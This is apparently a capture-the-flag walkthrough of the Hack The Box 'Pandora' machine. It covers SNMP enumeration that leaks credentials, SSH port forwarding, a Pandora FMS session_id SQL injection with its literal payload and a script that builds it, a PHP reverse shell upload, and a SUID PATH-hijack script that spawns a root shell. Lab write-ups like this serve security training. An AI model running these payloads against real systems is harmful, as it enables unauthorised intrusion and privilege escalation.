In this post, I would like to share a walkthrough of the Pandora machine from Hack The Box.


This machine is rated Easy on Hack The Box.

What will you gain from the Pandora machine?


For the user flag, you will need snmpwalk for further enumeration: the SNMP data leaks a set of credentials, and an SQL injection in the Pandora FMS console then gets us the admin dashboard.


For the root flag, you log in as matt over SSH and then abuse a SUID binary to obtain a root shell.

Information Gathering on Pandora Machine


Once we have started the VPN connection (the .ovpn file is downloaded from Hack The Box), we start information gathering on the machine with nmap -sC -sV -p- -Pn <IP Address>. Here -p- scans all 65535 TCP ports, -sC and -sV run the default scripts and service-version detection, and -Pn skips host discovery (the older spelling -PN is still accepted).

Pandora machine

Let’s open the website interface


Sadly, there is nothing we can use by browsing the website. So let's enumerate directories with the Gobuster tool.

SNMPWalk enumeration on pandora


Gobuster turns up nothing we can work with either. Since TCP gave us nothing further, let's scan UDP ports as well (nmap's -sU).


The UDP scan shows port 161 open, which is the SNMP service.


Based on my experience as a pentester, we can use the snmpwalk tool to enumerate SNMP further; all it needs is the read community string, which is very often left at the default, public.

** snmpwalk should be available in Kali Linux by default. If it is missing, install it with sudo apt-get install snmp (the snmp package provides snmpwalk; snmp-mibs-downloader adds the MIB definitions that turn raw OIDs into readable names). **


Oh wow! The walk reveals a username and password. This is a classic SNMP leak: HOST-RESOURCES-MIB exposes the full command line of every running process (hrSWRunParameters), so any credential passed as a command-line argument is readable by anyone who knows the community string.
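The following is an added example (not code from the original post): it walks the SNMP process table and joins each process name with its arguments, then flags command lines that carry a password-style option, which is exactly the kind of entry the screenshot above exposes. The snmpwalk call assumes SNMP v2c and a community string you supply (default public); the sample walk output at the bottom is constructed for the demonstration and is not from the target.

```shell
#!/bin/sh
# Added example, not from the original post: audit an SNMP process-table walk
# for credentials passed on the command line. SAMPLE_WALK below is constructed.

# Walk hrSWRunTable (1.3.6.1.2.1.25.4.2.1): process names and arguments.
# Needs network access to the target; "public" is the usual read community.
snmp_process_table() {
  target="$1"; community="${2:-public}"
  snmpwalk -v2c -c "$community" "$target" 1.3.6.1.2.1.25.4.2.1
}

# Join hrSWRunName.<pid> and hrSWRunParameters.<pid> records into "pid name args".
# The value is the text between the double quotes; the pid is the OID suffix.
join_proc_table() {
  awk -F'"' '
    /hrSWRunName\./       { split($1, a, /[.= ]/); name[a[2]] = $2 }
    /hrSWRunParameters\./ { split($1, a, /[.= ]/); args[a[2]] = $2 }
    END { for (p in args) printf "%s %s %s\n", p, name[p], args[p] }
  ' | sort -n
}

# Keep only processes whose arguments look like a password or secret option.
flag_credential_args() {
  grep -E '(^|[ "])(-p|-P|--pass(word)?|--secret|--token)[ =][^ "]+'
}

# Full pipeline: raw snmpwalk lines in, suspicious "pid name args" lines out.
audit_snmp_walk() {
  join_proc_table | flag_credential_args
}

# Constructed sample in snmpwalk's output format (not real data).
SAMPLE_WALK=$(cat <<'EOF'
HOST-RESOURCES-MIB::hrSWRunName.612 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunName.841 = STRING: "host_check"
HOST-RESOURCES-MIB::hrSWRunName.1102 = STRING: "mysql_sync"
HOST-RESOURCES-MIB::hrSWRunName.1377 = STRING: "mysqld"
HOST-RESOURCES-MIB::hrSWRunParameters.612 = STRING: "-f /etc/ssh/sshd_config"
HOST-RESOURCES-MIB::hrSWRunParameters.841 = STRING: "-u svc_backup -p S3cret-Example"
HOST-RESOURCES-MIB::hrSWRunParameters.1102 = STRING: "--password=Winter2024 --db pandora"
HOST-RESOURCES-MIB::hrSWRunParameters.1377 = STRING: "-c /etc/mysql/my.cnf"
EOF
)

# Live usage:  snmp_process_table 10.10.10.10 | audit_snmp_walk
printf '%s\n' "$SAMPLE_WALK" | audit_snmp_walk
```

Walking only the hrSWRunTable subtree is much faster than a default full walk of mib-2 and is enough for this leak; joining on the pid tells you which binary was started with the secret, which is what you need when deciding where the credential is valid.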


We can try to log in to the machine via SSH with those credentials.

Port Forwarding on the pandora machine


Voila! However, we cannot read the user flag even though we have an SSH session; this user is not allowed to read it.


Let's check which ports are listening locally by running netstat -an.


There is another web application listening on port 80 that is only reachable from the machine itself, so we forward it to our attacking machine with SSH local port forwarding (ssh's -L option; the URLs below use local port 8888).

Pandora website interface


Finally, through the forwarded port we reach a second web interface, the Pandora FMS console.


The default credentials found on the internet do not work here.


Let's research the Pandora FMS product and its known vulnerabilities.


We find a published write-up that describes the vulnerabilities in this version, so we can proceed with the next step.


Following that information, we request /include/chart_generator.php under the console, which only returns an error stating "Access is not granted".


We run sqlmap against that page's session_id parameter to confirm and exploit the SQL injection described in the write-up.


With sqlmap we can dump the console's session table, which stores the session IDs of users who are logged in.


At last, we obtain session IDs for the users daniel and matt.


Let's paste one of the session IDs we found into the URL:

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=<session id>


A dashboard appears, but sadly we cannot find anything useful in it: these sessions belong to low-privileged users.


Therefore, we need a session that gives us complete control of the Pandora console: the admin's.


As we already know, the Pandora console is vulnerable to SQL injection through the session_id parameter.


The SQL injection we abuse looks like this:

http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO

That is the payload before URL encoding; the encoded form that goes in the browser is:

 http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

Voila! After opening that URL and then reloading the console at its base URL on the forwarded port, we are logged in to the admin dashboard of Pandora FMS.
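Why the payload works: chart_generator.php looks the session up by session_id and then unserializes the stored session data, which PHP keeps in the form key|serialized-value. The UNION makes the query return a row we control, whose data column is id_usuario|s:5:"admin"; (a serialized 5-byte string naming the admin user), so the console treats the request as the admin's session; the trailing -- SgGO is a comment with junk after it so the required space after -- survives. The script below is an added example (not from the original post or from Pandora FMS) that builds that URL for any username, computing the string length the serialization needs and URL-encoding the characters that would break the query string. It assumes the SSH forward of the console's port 80 to local port 8888 used in the URLs above, and login_as assumes the server sets the session cookie on that first request, which is what the browser flow above relies on.

```shell
#!/bin/sh
# Added example, not from the original post: build the session_id injection URL
# for an arbitrary user. Assumes a local SSH forward 127.0.0.1:8888 -> target:80.

# Forward local port 8888 to the target's port 80 (run on the attacker box).
# Usage: forward_console user@10.10.10.10
forward_console() {
  ssh -N -L "8888:127.0.0.1:80" "$1"
}

# PHP session serialization of one variable: <key>|s:<byte length>:"<value>";
# ${#1} is a character count, which equals the byte count for ASCII usernames.
session_fragment() {
  printf 'id_usuario|s:%s:"%s";' "${#1}" "$1"
}

# UNION row with three columns, matching the page's payload; the third column is
# the session data the application unserializes. "-- SgGO" closes the query.
build_session_payload() {
  printf "' union SELECT 1,2,'%s' as data -- SgGO" "$(session_fragment "$1")"
}

# Encode only the characters that break the query string (space, ' and "),
# leaving | , ; and - alone exactly as the page's encoded URL does.
urlencode_payload() {
  printf '%s' "$1" | awk '
    BEGIN { ORS = "" }
    {
      for (i = 1; i <= length($0); i++) {
        c = substr($0, i, 1)
        if (c == " ")         printf "%%20"
        else if (c == "\047") printf "%%27"
        else if (c == "\"")   printf "%%22"
        else                  printf "%s", c
      }
    }'
}

# Full URL; the base can be overridden as the second argument.
build_session_url() {
  base="${2:-http://127.0.0.1:8888/pandora_console/include/chart_generator.php}"
  printf '%s?session_id=%s\n' "$base" "$(urlencode_payload "$(build_session_payload "$1")")"
}

# Hit the injection URL with a cookie jar, then reload the console with the
# cookie the server handed back (assumption: the session cookie is set on the
# first request, as the browser flow on this page relies on).
login_as() {
  curl -s -c cookies.txt "$(build_session_url "$1")" > /dev/null
  curl -s -b cookies.txt "http://127.0.0.1:8888/pandora_console/"
}

build_session_url admin
```

Computing the length instead of hard-coding s:5 matters: PHP's unserialize rejects a string whose declared length does not match, so a payload for daniel must say s:6.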

Gaining Shell Access


While looking at the application, I noticed it is written in PHP, so a PHP reverse shell uploaded through the console should execute on the server.


We start an nc listener on the attacker machine first so that the reverse shell has something to connect back to.


Under Admin tools there are several ways to upload our PHP reverse shell; I will use the File Manager.


The screenshot above shows the file directories, such as the images directory.


Let's upload the file there, as shown in the screenshot above.


The upload has been successful.


We trigger the reverse shell by requesting the uploaded file in the web root; the web server executes it and connects back to us.


Boom! We have our reverse shell connection.


We have accessed the machine as the user matt.


To get a proper interactive shell, we can run bash -i.


We can read the user flag by running cat user.txt.

Escalating to Root Privileges


For a proper shell on the machine, we want to log in as matt over SSH.

Obtaining a proper ssh access


To use SSH, we generate a key pair with ssh-keygen on the attacker machine.


We transfer the public key to the machine with wget, as in the screenshot above (serving it from the attacker machine over HTTP).


We append id_rsa.pub to a different file, ~/.ssh/authorized_keys.


For SSH to accept the key, authorized_keys must have permission 600 and the ~/.ssh directory 700; with StrictModes (the default) sshd silently ignores keys in a group- or world-writable directory or home.
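The steps above as one script, added here as an example (not from the original post): it installs a fetched public key for the current user with the ownership and permissions sshd's StrictModes requires, appends the key only once so re-running it is harmless, and checks the permission conditions afterwards. The home directory is a parameter (defaulting to $HOME) so the function can be exercised on a scratch directory; the key data in the usage comment is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post: install a public key the way
# sshd (StrictModes yes) expects, then verify the permission conditions.

# Usage on the target after fetching the key with wget:
#   install_authorized_key ./id_rsa.pub          # home defaults to $HOME
install_authorized_key() {
  pubkey="$1"; home="${2:-$HOME}"
  key=$(cat "$pubkey")
  mkdir -p "$home/.ssh"
  chmod 700 "$home/.ssh"                  # sshd ignores keys under a writable .ssh
  touch "$home/.ssh/authorized_keys"
  # append only if this exact key line is not already present (idempotent)
  grep -qxF -- "$key" "$home/.ssh/authorized_keys" ||
    printf '%s\n' "$key" >> "$home/.ssh/authorized_keys"
  chmod 600 "$home/.ssh/authorized_keys"
  chmod go-w "$home"                      # StrictModes also rejects a writable home
}

# First ten characters of ls -ld output, e.g. "drwx------".
mode_string() {
  ls -ld "$1" | cut -c1-10
}

# Mirror the checks sshd applies before trusting authorized_keys.
authorized_key_perms_ok() {
  home="${1:-$HOME}"
  [ "$(mode_string "$home/.ssh")" = "drwx------" ] || return 1
  [ "$(mode_string "$home/.ssh/authorized_keys")" = "-rw-------" ] || return 1
  case "$(mode_string "$home")" in
    ?????w*|????????w*) return 1 ;;       # group- or world-writable home directory
  esac
  return 0
}
```

If the login still fails after this, check the server side: sshd logs "Authentication refused: bad ownership or modes" in its auth log when StrictModes is the cause, and the account may simply have password or key login disabled in sshd_config.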


Sadly, we still cannot log in as matt via SSH.


After talking to my friends and trying multiple approaches on the machine, I managed to solve the issue by changing Hack The Box's VPN from the release VPN to the normal VPN.


Uwu! We have successfully logged in via SSH.


Let's search for any SUID file or anything else odd that we can use to escalate to root (find / -perm -4000 -type f 2>/dev/null lists SUID binaries). Sadly, there is nothing interesting in the /var/backups directory.


So we explore other directories, looking for any file that seems suspicious.


Finally, we find a file that looks odd, at least to me: pandora_backup, which ls highlights in red because the SUID bit is set.

Enumerate further with linpeas.sh


Let's download linpeas.sh onto the victim machine and make it executable.


Let's analyze the results while it is still running in the background.


Then let's analyze the binary itself, where I might find something readable.


Reading the file carefully, I notice a line that refers to pandora-backup.tar.gz, which suggests the binary calls tar and that we might abuse that.


I will explain each step shown above carefully.


We found that pandora_backup runs tar, and it does so by name rather than by absolute path, so we can create our own executable called tar that runs a command with root privileges.


We then need to make our tar file executable (chmod +x).


For the SUID binary to pick up our tar, we must prepend its directory to PATH (export PATH=<directory of our tar>:$PATH).


After that, we execute the SUID file (/usr/bin/pandora_backup); it runs our tar as root and we obtain a root shell.
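The PATH hijack above as a small script, added here as an example (not the original post's commands): plant_fake_tar writes the fake tar, run_with_hijacked_path runs a command with our directory first on PATH, and resolve_tar shows which tar a bare lookup would find. The fake tar runs /bin/bash -p by default: a SUID binary gives our process an effective UID of 0 but leaves the real UID as matt, and bash drops the effective UID on startup unless -p is given. The victim binary is not part of the script; the test exercises the functions against a constructed stand-in script that, like pandora_backup, calls tar by bare name.

```shell
#!/bin/sh
# Added example, not from the original post: hijack a relative "tar" lookup
# made by a SUID binary. Assumes we can write to some directory (e.g. /tmp).

# Candidates: SUID binaries, then the commands a suspect binary calls by name.
list_suid_binaries() {
  find / -perm -4000 -type f 2>/dev/null
}
list_bare_commands() {
  strings "$1" | grep -E '^(tar|cp|mv|sh|bash|chmod|chown) '
}

# Write a fake "tar" into $1 that runs $2 (default: a root shell).
# bash -p keeps the effective UID the SUID binary hands us; plain bash drops it.
plant_fake_tar() {
  dir="$1"; cmd="${2:-/bin/bash -p}"
  printf '#!/bin/sh\nexec %s\n' "$cmd" > "$dir/tar"
  chmod +x "$dir/tar"
}

# Run a command with our directory first on PATH, so "tar" resolves to ours.
# Real use: run_with_hijacked_path /tmp /usr/bin/pandora_backup
run_with_hijacked_path() {
  dir="$1"; shift
  env PATH="$dir:$PATH" "$@"
}

# Which file a bare "tar" resolves to with $1 prepended to PATH.
resolve_tar() {
  ( PATH="$1:$PATH"; command -v tar )
}
```

The underlying bug is the binary's trust in the caller's environment: a SUID program has to call helpers by absolute path or reset PATH itself, because PATH (unlike LD_PRELOAD, which the loader drops for set-user-ID executables) is inherited unchanged.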

Pandora Root flag

We can read the root flag by running cat root.txt.


-THE END-


Happy Learning Guys!

Extra Information


With root we can read /etc/shadow; the root password hash from it is what Hack The Box asks for to unlock and read the official write-up.